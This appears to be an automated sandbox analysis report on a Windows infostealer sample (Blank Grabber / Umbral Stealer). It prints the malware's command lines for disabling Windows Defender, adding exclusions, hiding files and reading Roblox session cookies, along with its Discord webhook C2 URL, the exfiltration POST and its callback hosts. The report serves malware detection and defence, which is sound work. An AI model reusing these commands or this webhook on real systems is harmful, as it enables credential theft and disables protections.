Windows Analysis Report
resembleC2.exe

Overview

General Information

Sample name: resembleC2.exe
Analysis ID: 1589390
MD5: 4c8044c83f60465eae3cc16d7c858085
SHA1: bc837ba36a8f244283483210215a11607f05fb63
SHA256: 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
Tags: exe, user-zhuzhu0009
Infos:

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • resembleC2.exe (PID: 1124 cmdline: "C:\Users\user\Desktop\resembleC2.exe" MD5: 4C8044C83F60465EAE3CC16D7C858085)
    • 6z2guuz0ldkdgc1o.exe (PID: 2828 cmdline: "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe" MD5: 8C7D2F0A936DBE6D0899D40171FFB668)
    • MoonHub.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" MD5: F70B5E56A09AF292D4E909C547F9C8C0)
      • WMIC.exe (PID: 3652 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 5008 cmdline: "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1492 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5336 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 6700 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4696 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2220 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 428 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 6324 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 6544 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5960 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1712 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5632 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 1524 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • OpenWith.exe (PID: 6628 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw", "Version": "v1.3"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\MoonHub.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
C:\Users\user\AppData\Local\Temp\MoonHub.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\MoonHub.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
  • 0x31f28:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x320ae:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x3214a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.resembleC2.exe.13020e48.1.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
0.2.resembleC2.exe.13020e48.1.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
0.2.resembleC2.exe.13020e48.1.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
  • 0x30128:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x302ae:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x3034a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
5.0.MoonHub.exe.156585b0000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
5.0.MoonHub.exe.156585b0000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |

                            System Summary

                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 6700, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
                            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T07:11:29.966839+0100 | 2045593 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 162.159.135.232 | 443 | TCP
2025-01-12T07:11:02.890379+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49947 | 208.95.112.1 | 80 | TCP

                            AV Detection

                            Source: resembleC2.exeAvira: detected
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Source: 0.2.resembleC2.exe.13020e48.1.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw", "Version": "v1.3"}
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrReversingLabs: Detection: 76%
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeReversingLabs: Detection: 34%
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeReversingLabs: Detection: 76%
                            Source: resembleC2.exeReversingLabs: Detection: 57%
                            Source: resembleC2.exeVirustotal: Detection: 58%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJoe Sandbox ML: detected
                            Source: resembleC2.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490536FE CryptUnprotectData,5_2_00007FF8490536FE
                            Source: resembleC2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:50018 version: TLS 1.2
                            Source: resembleC2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:50018 -> 162.159.135.232:443
                            Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 18.153.198.123:11057
                            Source: global trafficTCP traffic: 192.168.2.5:50024 -> 3.78.28.71:11057
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 3.78.28.71 3.78.28.71
                            Source: Joe Sandbox ViewIP Address: 18.153.198.123 18.153.198.123
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49947 -> 208.95.112.1:80
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: coprophile.bounceme.net
                            Source: global trafficDNS traffic detected: DNS query: 0.tcp.eu.ngrok.io
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: discord.com
                            Source: unknownHTTP traffic detected: POST /api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 938Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 06:11:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736662291x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2qTdgF1Cr38SEOGT23HWMs6OeP2AjvXe7equFCOi%2Fg5%2BwmV0tBGXLwLfu%2FlHCjDB9G1NO7lVFjLmxZQ05gmsEGqFdLEJMQ6q2VAgIo4M3DjVLI%2FrsnCdsgugyIE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=1a2e9aa9e0e9b0ac8198ee6fe4f49730073d799f-1736662289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=ob.OhzKQJmx9WAujruvt5OUCQLs9zf27vN7AvFbXxI4-1736662289919-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 900afd4ebf5178e7-EWR{"message": "Unknown Webhook", "code": 10015}
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 06:11:31 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736662292x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKVv4Q0YGUof%2FDk4xwgppxhE%2BNTAm7CbOF7VlJb5z13OICd9Uoh6%2B8tuWasMP7cVdvDmMG32JN%2BZYm3HS0BCtGI%2B3a2vln4sPZ86subu3v8Vv%2BolQgP4lYHf2nNG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 900afd53ae194308-EWR{"message": "Unknown Webhook", "code": 10015}
                            Source: powershell.exe, 0000001C.00000002.2845407848.000001994D12F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                            Source: powershell.exe, 0000000B.00000002.2297767430.0000017A10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15EB8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D33D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D473000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD818CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15EB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngP
                            Source: powershell.exe, 0000000B.00000002.2307172685.0000017A76B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
